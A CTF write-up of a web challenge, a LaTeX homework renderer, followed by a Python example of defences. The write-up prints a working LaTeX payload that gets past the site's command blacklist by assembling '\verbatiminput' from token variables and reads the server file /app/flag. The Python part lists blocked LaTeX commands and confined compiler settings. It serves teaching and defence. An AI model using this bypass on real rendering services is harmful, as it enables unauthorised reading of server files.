---
title: "Homework Render | Challenge"
tags: ctf writeup
---

Homework Render - web
===

## Description

Isn't writing math homework hard? We have created an easy-to-use homework submission portal that allows you to type up your homework. We don't think anyone can get into this server for free answers!

Author: `ap`

Connection Info:

:::info
https://hw-render.chall.lol
:::

## Exploit

![Screenshot of the challenge description](https://i.imgur.com/8ybAN3s.png)

In this challenge, we are given a website that renders LaTeX files, as shown in the image above. LaTeX is known to be exploitable for LFI (Local File Inclusion) through commands such as *\input*, which include a file in the LaTeX document. However, the website has a blacklist of certain text that cannot be used to call LaTeX commands.

After some trial and error using LaTeX commands, I discovered that we can use the following LaTeX code to gain local file inclusion and read the flag at */app/flag*:

```latex
\documentclass{article}
\RequirePackage{verbatim}
\begin{document}
\newtoks\in
\newtoks\put
\in={in}
\put={put}
\begin{verbatim\the\in\the\put}{/app/flag}\end{verbatim\the\in\the\put}
\end{document}
```

In the exploit above, we use *\RequirePackage* instead of *\usepackage* to import a package. We then use *\newtoks* to create new variables *in* and *put*, which hold the strings `in` and `put`. Finally, we use *\begin* and *\end* to call a string as a command: the environment name is assembled from the two variables, so the blacklisted text never appears literally in the source, and *\begin* ends up calling *\verbatiminput* to read the contents of */app/flag*.

After submitting the LaTeX code, the flag we obtain is shown below:

![](https://i.imgur.com/8RsTwYK.png)
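
Seen from the portal's side, the bypass above shows why matching forbidden strings in the source is not enough. The following is an added example, not part of the original writeup or the challenge's code: the blacklist contents, the allowlist policy and all function names are assumptions, and the compile settings assume a TeX Live `pdflatex`.

```python
import re

# Assumed stand-in for the portal's filter; the real blacklist is not shown in the writeup.
ASSUMED_BLACKLIST = ["\\input", "\\include", "\\usepackage", "\\verbatiminput", "\\write18"]

# Assumed allowlist policy for a math-homework renderer; adjust to what the portal must support.
ALLOWED_COMMANDS = {"documentclass", "begin", "end", "section", "frac", "sqrt",
                    "sum", "int", "alpha", "beta", "cdot", "left", "right", "textbf"}
ALLOWED_ENVIRONMENTS = {"document", "equation", "align", "itemize", "enumerate"}

CONTROL_SEQ = re.compile(r"\\([A-Za-z@]+|.)", re.DOTALL)   # \name or single-character \x
ENV_USE = re.compile(r"\\(?:begin|end)\s*\{([^{}]*)\}")    # literal text inside \begin{...}

# The payload from the writeup above, embedded only as input for the two filters.
WRITEUP_PAYLOAD = r"""\documentclass{article}
\RequirePackage{verbatim}
\begin{document}
\newtoks\in
\newtoks\put
\in={in}
\put={put}
\begin{verbatim\the\in\the\put}{/app/flag}\end{verbatim\the\in\the\put}
\end{document}
"""

def blacklist_allows(src):
    """Substring blacklist: True when no forbidden string appears literally in the source."""
    return not any(bad in src for bad in ASSUMED_BLACKLIST)

def allowlist_violations(src):
    """Allowlist: report every command or environment name that is not explicitly permitted."""
    problems = set()
    for m in CONTROL_SEQ.finditer(src):
        if m.group(1) not in ALLOWED_COMMANDS:
            problems.add("command \\" + m.group(1))
    for m in ENV_USE.finditer(src):
        if m.group(1).strip() not in ALLOWED_ENVIRONMENTS:
            problems.add("environment " + m.group(1).strip())
    return sorted(problems)

def confined_compile(tex_path):
    """Return (argv, env overrides) for compiling untrusted input with file access restricted."""
    argv = ["pdflatex", "-no-shell-escape", "-interaction=nonstopmode", "-halt-on-error", tex_path]
    env = {"openin_any": "p", "openout_any": "p"}  # kpathsea paranoid mode: no absolute or parent paths
    return argv, env
```

The blacklist accepts the payload, while the allowlist rejects it on `\RequirePackage`, `\newtoks`, `\the` and the computed environment name. Source filtering is only one layer; the confined compiler settings are what keep a missed construct from reaching files such as `/app/flag`.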